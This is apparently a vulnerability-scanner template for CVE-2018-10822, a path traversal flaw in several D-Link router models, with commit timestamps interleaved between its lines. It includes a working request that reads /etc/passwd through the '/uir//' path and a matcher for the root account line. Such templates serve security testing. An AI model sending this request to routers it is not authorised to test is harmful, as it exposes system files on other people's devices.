2021-07-24 22:49:24 +00:00
id : CVE-2018-10822
info :
2022-06-19 15:34:04 +00:00
name : D-Link Routers - Local File Inclusion
2021-07-24 22:49:24 +00:00
author : daffainfo
2021-07-25 19:34:31 +00:00
severity : high
2022-06-19 15:34:04 +00:00
description : D-Link routers DWR-116 through 1.06, DIR-140L through 1.02, DIR-640L through 1.02,DWR-512 through 2.02,DWR-712 through 2.02,DWR-912 through 2.02, DWR-921 through 2.02, DWR-111 through 1.01, and probably others with the same type of firmware allows remote attackers to read arbitrary files via a /.. or // after "GET /uir" in an HTTP request to the web interface.
2021-08-18 11:37:49 +00:00
reference :
2021-07-24 22:49:24 +00:00
- https://www.exploit-db.com/exploits/45678
2022-05-17 09:18:12 +00:00
- http://sploit.tech/2018/10/12/D-Link.html
2022-06-19 15:34:04 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2018-10822
2022-06-20 17:58:28 +00:00
- https://seclists.org/fulldisclosure/2018/Oct/36
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 7.5
2021-09-10 11:26:40 +00:00
cve-id : CVE-2018-10822
cwe-id : CWE-22
2022-08-27 04:41:18 +00:00
tags : dlink,edb,seclists,cve,cve2018,lfi,router
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2021-07-24 22:49:24 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-07-24 22:49:24 +00:00
- method : GET
path :
- "{{BaseURL}}/uir//etc/passwd"
matchers-condition : and
matchers :
- type : regex
regex :
2022-03-22 08:01:31 +00:00
- "root:.*:0:0:"
2021-07-24 22:49:24 +00:00
- type : status
status :
- 200
2022-06-19 15:34:04 +00:00
# Enhanced by mp on 2022/06/19